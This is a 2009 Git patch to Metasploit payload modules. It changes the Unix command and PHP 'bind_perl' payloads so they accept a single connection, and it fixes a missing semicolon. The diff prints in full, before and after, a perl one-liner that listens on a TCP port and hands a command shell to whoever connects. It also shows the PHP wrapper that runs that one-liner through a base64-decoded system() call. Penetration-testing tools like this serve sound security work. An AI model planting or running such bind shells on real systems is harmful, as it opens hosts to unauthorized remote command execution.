From 5ddfffc94feb6a14188746f5c5df58d46816cbc1 Mon Sep 17 00:00:00 2001 From: James Lee Date: Wed, 9 Dec 2009 23:49:50 +0000 Subject: [PATCH] only accept one connection for bind_perl shells. fixes 669 git-svn-id: file:///home/svn/framework3/trunk@7790 4d416f70-5f16-0410-b530-b9f4589650da --- modules/payloads/singles/cmd/unix/bind_perl.rb | 4 ++-- modules/payloads/singles/php/bind_perl.rb | 6 +++--- 2 files changed, 5 insertions(+), 5 deletions(-) diff --git a/modules/payloads/singles/cmd/unix/bind_perl.rb b/modules/payloads/singles/cmd/unix/bind_perl.rb index 6c0158c7d4..029fdfd4b9 100644 --- a/modules/payloads/singles/cmd/unix/bind_perl.rb +++ b/modules/payloads/singles/cmd/unix/bind_perl.rb @@ -23,7 +23,7 @@ module Metasploit3 super(merge_info(info, 'Name' => 'Unix Command Shell, Bind TCP (via perl)', 'Version' => '$Revision$', - 'Description' => 'Listen for a connection and spawn a command shell via perl (persistent)', + 'Description' => 'Listen for a connection and spawn a command shell via perl', 'Author' => ['Samy ', 'cazz'], 'License' => BSD_LICENSE, 'Platform' => 'unix', @@ -52,7 +52,7 @@ module Metasploit3 # def command_string - cmd = "perl -MIO -e '$p=fork();exit,if$p;while($c=new IO::Socket::INET(LocalPort,#{datastore['LPORT']},Reuse,1,Listen)->accept){$~->fdopen($c,w);STDIN->fdopen($c,r);system$_ while<>}'" + cmd = "perl -MIO -e '$p=fork();exit,if$p;$c=new IO::Socket::INET(LocalPort,#{datastore['LPORT']},Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);system$_ while<>'" return cmd end diff --git a/modules/payloads/singles/php/bind_perl.rb b/modules/payloads/singles/php/bind_perl.rb index 5233f46526..e12aa19c43 100644 --- a/modules/payloads/singles/php/bind_perl.rb +++ b/modules/payloads/singles/php/bind_perl.rb @@ -43,7 +43,7 @@ module Metasploit3 # Constructs the payload # def generate - return super + "system(base64_decode('#{Rex::Text.encode_base64(command_string)}'))" + return super + "system(base64_decode('#{Rex::Text.encode_base64(command_string)}'));" end # @@ -51,9 +51,9 @@ module Metasploit3 # def command_string - cmd = "perl -MIO -e '$p=fork();exit,if$p;while($c=new IO::Socket::INET(LocalPort,#{datastore['LPORT']},Reuse,1,Listen)->accept){$~->fdopen($c,w);STDIN->fdopen($c,r);system$_ while<>}'" + cmd = "perl -MIO -e '$p=fork();exit,if$p;$c=new IO::Socket::INET(LocalPort,#{datastore['LPORT']},Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);system$_ while<>'" return cmd end -end \ No newline at end of file +end